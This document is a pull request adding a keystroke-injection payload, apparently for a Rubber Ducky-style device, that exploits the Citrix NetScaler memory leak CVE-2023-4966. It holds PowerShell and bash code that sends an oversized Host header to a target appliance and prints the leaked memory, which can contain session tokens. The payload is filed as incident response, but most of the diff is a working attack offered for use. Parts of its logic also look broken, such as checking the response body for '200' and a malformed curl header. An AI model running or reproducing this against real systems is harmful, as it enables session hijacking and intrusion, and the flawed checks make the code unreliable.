### PR TITLE
Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966

### DIFF
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
@@ -1,0 +1,139 @@
+REM ################################################################################
+REM #                                                                              #
+REM # Title     : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966   #
+REM # Author	: Aleff                                                            #
+REM # Version	: 1.0                                                              #
+REM # Category	: incident-response                                                #
+REM # Target	: Citrix NetScaler ADV; NetScaler Gateway                          #
+REM #                                                                              #
+REM ################################################################################
+
+REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
+DEFINE #HOSTNAME example
+
+REM Detect when the machine is ready
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+REM Detect what in what OS is running the payload
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+
+    REM Payload content
+    IF ($_OS == WINDOWS) THEN
+
+        REM Open a powershell
+        GUI r
+        DELAY 500
+        STRING powershell
+        ENTER
+        DELAY 1000
+
+        STRINGLN
+            $header_value = 'a' * 24576
+            $header_value = $header_value -replace "\n", ""
+
+            $headers="-H 'Host:$header_value'"
+
+            $headers = @{
+                'Host' = $header_value
+            }
+            $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
+            $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
+
+            if ($response.Substring(0, 3) -eq "200") {
+                Write-Host "--- Dumped memory ---"
+                $response.Substring(131050)  # 131051 - 1
+                Write-Host "The #HOSTNAME is vulnerable!"
+                Write-Host "---      End      ---"
+            } else {
+                Write-Host "Could not dump memory"
+            }
+        END_STRINGLN
+    ELSE
+        CTRL-ALT t
+        DELAY 1000
+
+        STRINGLN
+            header_value=$(yes a | head -n 24576 | tr -d '\n')
+
+            headers="-H 'Host:$header_value'"
+
+            response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
+
+            if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
+                echo "--- Dumped memory ---"
+                echo "$response" | cut -c 131051-
+                echo "The #HOSTNAME is vulnerable!"
+                echo "---      End      ---"
+            else
+                echo "Could not dump memory"
+            fi
+        END_STRINGLN
+    END_IF
+
+END_EXTENSION


### PR DESCRIPTION
This payload sends an HTTP request to a remote server using the `curl` command. If the request succeeds, it means the exploit was successful. Conversely, if the request fails, it indicates that the target has resisted the attack.